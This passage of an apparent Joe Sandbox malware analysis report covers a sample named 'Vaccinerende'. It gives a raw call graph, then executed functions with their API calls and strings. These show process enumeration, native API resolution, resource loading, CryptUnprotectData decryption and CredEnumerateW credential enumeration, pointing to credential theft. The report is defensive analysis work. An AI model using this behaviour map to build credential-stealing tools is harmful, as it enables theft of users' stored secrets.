memcpy 39780->39828 39782 4304f3 39782->39785 39829 430468 11 API calls 39782->39829 39784 430506 39784->39785 39786 43057b 39784->39786 39830 43817e 39784->39830 39785->39772 39787 415a91 memset 39786->39787 39789 430584 39787->39789 39789->39785 39835 4397fd memset 39789->39835 39791 4305e4 39791->39785 39836 4328e4 12 API calls 39791->39836 39793 43052d 39793->39785 39793->39786 39796 430542 39793->39796 39795 4305fa 39797 430609 39795->39797 39837 423383 11 API calls 39795->39837 39796->39785 39834 4169a7 11 API calls 39796->39834 39838 423330 11 API calls 39797->39838 39800 430634 39839 423399 11 API calls 39800->39839 39802 430648 39840 4233ae 11 API calls 39802->39840 39804 43066b 39841 423330 11 API calls 39804->39841 39806 43067d 39842 4233ae 11 API calls 39806->39842 39808 430695 39843 423330 11 API calls 39808->39843 39810 4306d6 39845 423330 11 API calls 39810->39845 39811 4306a7 39811->39810 39813 4306c0 39811->39813 39844 4233ae 11 API calls 39813->39844 39814 4306d1 39846 430369 17 API calls 39814->39846 39817 4306f3 39847 423330 11 API calls 39817->39847 39819 430704 39848 423330 11 API calls 39819->39848 39821 430710 39849 423330 11 API calls 39821->39849 39823 43071e 39850 423383 11 API calls 39823->39850 39825->39773 39826->39777 39827->39780 39828->39782 39829->39784 39831 438187 39830->39831 39833 438192 39830->39833 39851 4380f6 39831->39851 39833->39793 39834->39785 39835->39791 39836->39795 39837->39797 39838->39800 39839->39802 39840->39804 39841->39806 39842->39808 39843->39811 39844->39814 39845->39814 39846->39817 39847->39819 39848->39821 39849->39823 39850->39785 39853 43811f 39851->39853 39852 438164 39852->39833 39853->39852 39856 437e5e 39853->39856 39879 4300e8 memset memset memcpy 39853->39879 39880 437d3c 39856->39880 39858 437eb3 39858->39853 39859 437ea9 39859->39858 39865 437f22 39859->39865 39895 41f432 39859->39895 39862 437f06 39945 415c56 11 API calls 39862->39945 39864 437f95 39946 415c56 11 API calls 39864->39946 39866 437f7f 39865->39866 39867 432d4e 3 API calls 39865->39867 39866->39864 39868 43802b 39866->39868 39867->39866 39906 4165ff 39868->39906 39874 43806b 39875 438094 39874->39875 39947 42f50e 138 API calls 39874->39947 39876 437fa3 39875->39876 39948 4300e8 memset memset memcpy 39875->39948 39876->39858 39949 41f638 104 API calls 39876->39949 39879->39853 39881 437d69 39880->39881 39884 437d80 39880->39884 39950 437ccb 11 API calls 39881->39950 39883 437d76 39883->39859 39884->39883 39885 437da3 39884->39885 39886 437d90 39884->39886 39888 438460 134 API calls 39885->39888 39886->39883 39954 437ccb 11 API calls 39886->39954 39890 437dcb 39888->39890 39894 437de8 39890->39894 39951 444283 13 API calls 39890->39951 39892 437dfc 39952 437ccb 11 API calls 39892->39952 39953 424f26 123 API calls 39894->39953 39896 41f54d 39895->39896 39899 41f44f 39895->39899 39897 41f466 39896->39897 39984 41c635 memset memset 39896->39984 39897->39862 39897->39865 39899->39897 39904 41f50b 39899->39904 39955 41f1a5 39899->39955 39980 41c06f memcmp 39899->39980 39981 41f3b1 90 API calls 39899->39981 39982 41f398 86 API calls 39899->39982 39904->39896 39904->39897 39983 41c295 86 API calls 39904->39983 39907 4165a0 11 API calls 39906->39907 39908 41660d 39907->39908 39909 437371 39908->39909 39910 41703f 11 API calls 39909->39910 39911 437399 39910->39911 39912 43739d 39911->39912 39913 4373ac 39911->39913 40071 4446ea 11 API calls 39912->40071 39915 416935 16 API calls 39913->39915 39938 4373ca 39915->39938 39916 437584 39918 4375bc 39916->39918 40078 42453e 123 API calls 39916->40078 39917 438460 134 API calls 39917->39938 39920 415c7d 16 API calls 39918->39920 39921 4375d2 39920->39921 39923 4442e6 11 API calls 39921->39923 39925 4373a7 39921->39925 39922 4251c4 137 API calls 39922->39938 39924 4375e2 39923->39924 39924->39925 40079 444283 13 API calls 39924->40079 39925->39874 39927 415a91 memset 39927->39938 39930 43758f 40077 42453e 123 API calls 39930->40077 39933 4375f4 39936 437620 39933->39936 39937 43760b 39933->39937 39935 43759f 39939 416935 16 API calls 39935->39939 39941 416935 16 API calls 39936->39941 40080 444283 13 API calls 39937->40080 39938->39916 39938->39917 39938->39922 39938->39927 39938->39930 39944 437d3c 135 API calls 39938->39944 40072 425433 13 API calls 39938->40072 40073 425413 17 API calls 39938->40073 40074 42533e 16 API calls 39938->40074 40075 42538f 16 API calls 39938->40075 40076 42453e 123 API calls 39938->40076 39939->39916 39941->39925 39943 437612 memcpy 39943->39925 39944->39938 39945->39858 39946->39876 39947->39875 39948->39876 39949->39858 39950->39883 39951->39892 39952->39894 39953->39883 39954->39883 39985 41bc3b 39955->39985 39958 41edad 86 API calls 39959 41f1cb 39958->39959 39960 41f1f5 memcmp 39959->39960 39961 41f20e 39959->39961 39965 41f282 39959->39965 39960->39961 39962 41f21b memcmp 39961->39962 39961->39965 39963 41f326 39962->39963 39966 41f23d 39962->39966 39964 41ee6b 86 API calls 39963->39964 39963->39965 39964->39965 39965->39899 39966->39963 39967 41f28e memcmp 39966->39967 40009 41c8df 56 API calls 39966->40009 39967->39963 39968 41f2a9 39967->39968 39968->39963 39971 41f308 39968->39971 39972 41f2d8 39968->39972 39970 41f269 39970->39963 39973 41f287 39970->39973 39974 41f27a 39970->39974 39971->39963 40011 4446ce 11 API calls 39971->40011 39975 41ee6b 86 API calls 39972->39975 39973->39967 39976 41ee6b 86 API calls 39974->39976 39977 41f2e0 39975->39977 39976->39965 40010 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39977->40010 39980->39899 39981->39899 39982->39899 39983->39896 39984->39897 39986 41be0b 39985->39986 39988 41bc54 39985->39988 39989 41bd61 39986->39989 40020 41ae17 34 API calls 39986->40020 39988->39986 39988->39989 40000 41bc8d 39988->40000 40012 41baf0 55 API calls 39988->40012 39991 41be45 39989->39991 40021 41a25f memset 39989->40021 39991->39958 39991->39965 39993 41be04 40019 41aee4 56 API calls 39993->40019 39995 41bd42 39995->39989 39995->39993 39996 41bdd8 memset 39995->39996 39997 41bdba 39995->39997 39998 41bde7 memcmp 39996->39998 40008 4175ed 6 API calls 39997->40008 39998->39993 40001 41bdfd 39998->40001 39999 41bd18 39999->39989 39999->39995 40017 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39999->40017 40000->39989 40000->39995 40000->39999 40013 4151e3 40000->40013 40018 41a1b0 memset 40001->40018 40004 41bdcc 40004->39989 40004->39998 40008->40004 40009->39970 40010->39965 40011->39963 40012->40000 40022 41837f 40013->40022 40016 444706 11 API calls 40016->39999 40017->39995 40018->39993 40019->39986 40020->39989 40021->39991 40023 4183c1 40022->40023 40024 4183ca 40022->40024 40069 418197 25 API calls 40023->40069 40027 4151f9 40024->40027 40043 418160 40024->40043 40027->39999 40027->40016 40028 4183e5 40028->40027 40052 41739b 40028->40052 40031 418444 CreateFileW 40033 418477 40031->40033 40032 41845f CreateFileA 40032->40033 40034 4184c2 memset 40033->40034 40035 41847e GetLastError free 40033->40035 40055 418758 40034->40055 40036 4184b5 40035->40036 40037 418497 40035->40037 40070 444706 11 API calls 40036->40070 40039 41837f 49 API calls 40037->40039 40039->40027 40044 41739b GetVersionExW 40043->40044 40045 418165 40044->40045 40047 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 40045->40047 40048 418178 40047->40048 40049 41817f 40048->40049 40050 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 40048->40050 40049->40028 40051 418188 free 40050->40051 40051->40028 40053 4173d6 40052->40053 40054 4173ad GetVersionExW 40052->40054 40053->40031 40053->40032 40054->40053 40056 418680 43 API calls 40055->40056 40057 418782 40056->40057 40058 418160 11 API calls 40057->40058 40060 418506 free 40057->40060 40059 418799 40058->40059 40059->40060 40061 41739b GetVersionExW 40059->40061 40060->40027 40062 4187a7 40061->40062 40063 4187da 40062->40063 40064 4187ad GetDiskFreeSpaceW 40062->40064 40065 4187ec GetDiskFreeSpaceA 40063->40065 40068 4187e8 40063->40068 40067 418800 free 40064->40067 40065->40067 40067->40060 40068->40065 40069->40024 40070->40027 40071->39925 40072->39938 40073->39938 40074->39938 40075->39938 40076->39938 40077->39935 40078->39918 40079->39933 40080->39943

                                            Executed Functions

                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                            APIs
                                            • memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                            • memset.MSVCRT ref: 0040DF5F
                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                            • API String ID: 708747863-3398334509
                                            • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                            • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                            Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                                            APIs
                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                            • memset.MSVCRT ref: 00413D7F
                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                            • memset.MSVCRT ref: 00413E07
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                            • free.MSVCRT ref: 00413EC1
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                            • API String ID: 1344430650-1740548384
                                            • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                            • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                            Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                            • String ID: AE$BIN
                                            • API String ID: 1668488027-3931574542
                                            • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                            • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                            Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                            • String ID:
                                            • API String ID: 767404330-0
                                            • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                            • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileFind$FirstNext
                                            • String ID:
                                            • API String ID: 1690352074-0
                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0041898C
                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: InfoSystemmemset
                                            • String ID:
                                            • API String ID: 3558857096-0
                                            • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                            • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 41 445823-445826 14->41 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 50 445879-44587c 18->50 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 32 445605-445607 22->32 33 445603 22->33 30 4459f2-4459fa 23->30 31 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->31 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 43 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 30->43 44 445b29-445b32 30->44 145 4459d0-4459e8 call 40b6ef 31->145 146 4459ed 31->146 32->21 37 445609-44560d 32->37 33->32 37->21 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 37->48 38->3 39->38 51 44584c-445854 call 40b1ab 41->51 52 445828 41->52 182 445b08-445b15 call 40ae51 43->182 53 445c7c-445c85 44->53 54 445b38-445b96 memset * 3 44->54 156 445665-445670 call 40b1ab 48->156 157 445643-445663 call 40a9b5 call 4087b3 48->157 64 4458a2-4458aa call 40b1ab 50->64 65 44587e 50->65 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 82 445fae-445fb2 60->82 83 445d2b-445d3b 60->83 160 445cf5 61->160 161 445cfc-445d03 61->161 64->19 75 445884-44589d call 40a9b5 call 4087b3 65->75 143 445849 66->143 249 445c77 67->249 68->67 76 445ba2-445bcf call 4099c6 call 445403 call 445389 68->76 148 44589f 75->148 76->53 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 110 4456ba-4456c4 78->110 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 193 445e17 99->193 194 445e1e-445e25 99->194 123 4457f9 110->123 124 4456ca-4456d3 call 413cfa call 413d4c 110->124 123->6 174 4456d8-4456f7 call 40b2cc call 413fa6 124->174 140->141 141->23 143->51 145->146 146->30 148->64 150->78 150->93 156->110 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->60 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 193->194 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 194->198 199 445e6b-445e7e call 445093 194->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->44 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 254 445f9b 220->254 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->53 254->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                            APIs
                                            • memset.MSVCRT ref: 004455C2
                                            • wcsrchr.MSVCRT ref: 004455DA
                                            • memset.MSVCRT ref: 0044570D
                                            • memset.MSVCRT ref: 00445725
                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                              • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
